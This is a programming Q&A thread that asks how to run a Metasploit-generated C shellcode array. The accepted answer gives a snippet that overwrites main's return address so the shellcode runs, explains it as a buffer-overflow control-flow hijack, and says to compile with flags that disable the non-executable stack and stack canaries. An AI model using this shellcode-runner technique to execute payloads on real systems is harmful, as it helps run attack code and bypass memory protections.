# how to compile a generated exploit in metasploit into a C program

Tags: exploit, metasploit, c

Once you generate an exploit in metasploit with the '-t c' tag you get an array with a bytecode like

```
unsigned char buf[] = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
...snip...
```

My question is how do you compile and run this bytecode in C?

Comment: Are you asking how to compile in C? Or are you asking how to compile bytecode in C? Like, do you know about gcc?

Answer (score 2, accepted):

The code is already 'compiled' machine code. Just do something like this in `main()`:

```
int *ret;
ret = (int *)&ret + 2;
*ret = (int) buf;
```

Just make sure you disable non-executable stack with `-z execstack` flag while compiling.

**EDIT:**
Breaking down the code -

```
int *ret;
```

We are declaring an int pointer named `ret` as a local variable in `main()`. Being the first and only variable, it lies immediately below the old frame pointer in the stack.

```
ret = (int *)&ret + 2;
```

Next, we are adding 2 to the address of the `ret` pointer and storing it back in `ret`. If you look at the figure, the return address lies exactly 2 dwords above `ret`. So we are basically storing the address of the return address in `ret`.

```
*ret = (int) buf;
```

Finally, we are dereferencing `ret` to replace the existing return address with the address of `buf` (our shellcode - presumably declared globally).

`main()` will therefore be returning to `buf` instead of where it was supposed to. The bytes in `buf` will be interpreted as code and will be executed happily. This is what typically happens in a vanilla buffer overflow exploit. The control flow is hijacked by causing a buffer to overflow and making it overwrite the return address with something that the hacker has control over (usually injected shellcode).

Do note that modern OSes usually store additional stack canaries to detect overflows. Therefore the offset '2' might not hold true. For simplicity, use the `-fno-stack-protector` flag while compiling in gcc to disable stack canaries.[image]

Comment: is it possible to explain line by line what the code exactly does and why you put +2 on the second line? maybe give a complete example of the code anyway your code seems nice

Comment: Sure, check the edited answer.